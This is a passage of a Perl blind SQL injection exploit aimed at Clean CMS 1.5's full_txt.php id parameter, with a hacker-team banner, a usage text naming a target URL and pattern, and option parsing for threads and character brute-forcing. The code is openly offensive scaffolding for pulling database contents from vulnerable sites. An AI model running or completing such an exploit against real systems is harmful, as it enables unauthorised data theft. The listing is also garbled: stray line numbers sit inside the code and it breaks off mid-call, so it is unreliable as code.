# Clean CMS 1.5 (full_txt.php id) Blind SQL Injection Exploit
# url: http://www.4yoursite.nl/script_clean_cms.php
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://hack0wn.com && spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purposes. Use it at your own risk.
# The author will not be responsible for any damage.
#
# Hack0wn :D
# ---- Tunables ---------------------------------------------------------
# File-scope settings consumed by the option parsing below and by code
# outside this excerpt. Values are unchanged from the original listing.

# Thread-related fallbacks (-t and -T take these when not given or not
# numeric). Units of the timeout are not stated here - presumably seconds.
my $DEFAULT_THREADS         = 15;
my $DEFAULT_THREADS_TIMEOUT = 30;
my $DEFAULT_THREADS_TIME    = 1;

# Fallback for -l; the usage text calls it "maximum table name length".
my $MAX_FIELD_LENGTH = 200;

# Flag whose meaning is implied only by its name; its use is outside
# this excerpt.
my $EXIT_IF_NO_CHAR = 1;

# Character codes 32 .. 123 that later code iterates over (use is
# outside this excerpt).
my @ascii = (32 .. 123);
22 use LWP::UserAgent ;
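# Print the usage text to STDERR and terminate; this sub never returns.
# Invoked for -h/--help and referenced from the required-option check.
# $0, $DEFAULT_THREADS and $MAX_FIELD_LENGTH are file-scope variables
# declared earlier in the file.
#
# Fix: the listing's usage string had picked up page-gutter numbers,
# U+2212 minus signs and typographic quotes from extraction, so the
# option names it printed ("−u") did not match what the parser expects
# ("-u"). The text is restored to plain ASCII; a heredoc keeps the layout
# readable and avoids escaping the inner quotes of the example line.
sub _HELP_AND_EXIT
{
    # The message ends with a newline on purpose: die() then omits the
    # "at FILE line N" suffix, as the original did.
    die <<"USAGE";


    ./$0 -u <url> -p <pattern>


Options:

    -u <url>        Ex: http://localhost/full_txt.php?id=19

    -p <pattern>    HTML pattern.


Other:

    -t <#>          Threads, default '$DEFAULT_THREADS'.

    -l <#>          Maximum table name length '$MAX_FIELD_LENGTH'.

    -T <#>          Timeout.

    -h              Help (also with --help).


Example:


    ./$0 -u "http://localhost/full_txt.php?id=19" -p Concurso

USAGE
}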
46
47
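# ---- Command-line handling --------------------------------------------
# Options arrive as "-x value" pairs. $p holds the parsed options; $w
# records which of them fell back to a default so they can be reported.
#
# Fixes relative to the listing: a lone trailing flag (e.g. "-h") used to
# give "{ @ARGV }" an odd number of elements, misaligning keys and values
# and emitting an "Odd number of elements" warning; the numeric checks
# used /^\d+$/, which accepts a trailing newline; map/grep were used in
# void context and the help sub was called with the legacy "&" form.
# $DEFAULT_THREADS, $MAX_FIELD_LENGTH, $DEFAULT_THREADS_TIMEOUT and
# _HELP_AND_EXIT are defined elsewhere in this file.
my @args = @ARGV;
push @args, undef if @args % 2;     # lone trailing flag gets an undef value
my ($p, $w) = ({ @args }, {});

# Help requested: any option key equal to -h or --help.
for my $key (keys %$p) {
    _HELP_AND_EXIT() if $key eq '--help' or $key eq '-h';
}

# Both -u and -p are mandatory (tested for truthiness, as before).
for my $opt (qw(-u -p)) {
    die "[!] Require: $opt\n[!] Help: ./$0 --help\n" unless $p->{$opt};
}

# Numeric options: accept only an integer (\A...\z so "15\n" or "15abc"
# do not slip through); otherwise fall back to the default and note it
# in $w. As in the original, an explicit "0" is not truthy and therefore
# also falls back to the default.
my %default_for = (
    '-t' => $DEFAULT_THREADS,
    '-l' => $MAX_FIELD_LENGTH,
    '-T' => $DEFAULT_THREADS_TIMEOUT,
);
for my $opt (sort keys %default_for) {
    my $given = $p->{$opt};
    if ($given and $given =~ /\A\d+\z/) {
        $p->{$opt} = $given;
    }
    else {
        $p->{$opt} = $w->{$opt} = $default_for{$opt};
    }
}

# Report every option that fell back to its default.
warn "[i] Getting default: $_ $w->{$_}\n" for sort keys %$w;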
66 ( &_IS_VU